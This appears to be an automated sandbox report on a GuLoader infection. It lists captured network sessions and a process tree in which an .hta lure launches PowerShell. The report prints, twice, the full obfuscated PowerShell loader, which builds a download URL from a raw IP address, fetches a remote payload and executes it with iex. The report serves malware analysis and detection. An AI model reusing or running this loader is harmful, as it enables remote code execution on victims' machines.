                                                                                                              Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="TTCb9tBCv
                                                                                                              Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49719 | 142.250.80.100 | 443 | 4952 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:14:22 UTC | 738 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
2024-05-01 23:14:22 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                              Date: Wed, 01 May 2024 23:14:22 GMT
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Content-Type: text/html
                                                                                                              Server: HTTP server (unknown)
                                                                                                              Content-Length: 3113
                                                                                                              X-XSS-Protection: 0
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                              Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="0p8y1TZP_ah4O6d1ifcXD--rhkcoVIVhm
                                                                                                              Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49720 | 20.12.23.50 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:14:24 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                              Host: slscr.update.microsoft.com
2024-05-01 23:14:24 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Expires: -1
                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                              MS-CorrelationId: a393436e-e60e-4418-82f7-96088caddc6a
                                                                                                              MS-RequestId: 95bf2157-a1b7-4046-9e38-a81ac92536e9
                                                                                                              MS-CV: fF+dAtgtx0WnAWUx.0
                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Date: Wed, 01 May 2024 23:14:24 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port
7 | 192.168.2.5 | 49727 | 23.1.237.91 | 443
Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:14:27 UTC | 2148 | OUT | POST /threshold/xls.aspx HTTP/1.1
                                                                                                              Origin: https://www.bing.com
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              Content-type: text/xml
                                                                                                              X-Agent-DeviceId: 01000A410900D492
                                                                                                              X-BM-CBT: 1696428841
                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                              X-BM-DeviceDimensions: 784x984
                                                                                                              X-BM-DeviceDimensionsLogical: 784x984
                                                                                                              X-BM-DeviceScale: 100
                                                                                                              X-BM-DTZ: 120
                                                                                                              X-BM-Market: CH
                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                              X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                                                              X-Device-isOptin: false
                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                              X-Device-OSSKU: 48
                                                                                                              X-Device-Touch: false
                                                                                                              X-DeviceID: 01000A410900D492
                                                                                                              X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                              X-PositionerType: Desktop
                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                              X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                              X-UserAgeClass: Unknown
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Content-Length: 2484
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714605232991&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
2024-05-01 23:14:27 UTC | 1 | OUT | Data Raw: 3c
                                                                                                              Data Ascii: <
                                                                                                              Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-05-01 23:14:28 UTC | 479 | IN | HTTP/1.1 204 No Content
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: 4345EE36A03D499BA0A7C59FFB288B5D Ref B: LAX311000108017 Ref C: 2024-05-01T23:14:28Z
                                                                                                              Date: Wed, 01 May 2024 23:14:28 GMT
                                                                                                              Connection: close
                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                              X-CDN-TraceID: 0.57ed0117.1714605268.5759083


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49734 | 20.12.23.50 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-05-01 23:15:06 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                              Host: slscr.update.microsoft.com
2024-05-01 23:15:07 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Expires: -1
                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                              ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                              MS-CorrelationId: 5fd93b0f-cdc7-46e5-a982-db3bd6076372
                                                                                                              MS-RequestId: 236f0631-b103-49de-a586-455877f8bb1f
                                                                                                              MS-CV: BFVoo1IMe0SEdIPB.0
                                                                                                              X-Microsoft-SLSClientCache: 2160
                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Date: Wed, 01 May 2024 23:15:06 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 25457



                                                                                                              Target ID:0
                                                                                                              Start time:01:14:02
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta"
                                                                                                              Imagebase:0x6a0000
                                                                                                              File size:13'312 bytes
                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:01:14:03
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . 
MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. 
mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. 
') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;"
                                                                                                              Imagebase:0x7a0000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:01:14:03
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:01:14:03
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:4
                                                                                                              Start time:01:14:04
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
                                                                                                              Imagebase:0x790000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:01:14:10
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . 
MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. 
mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. 
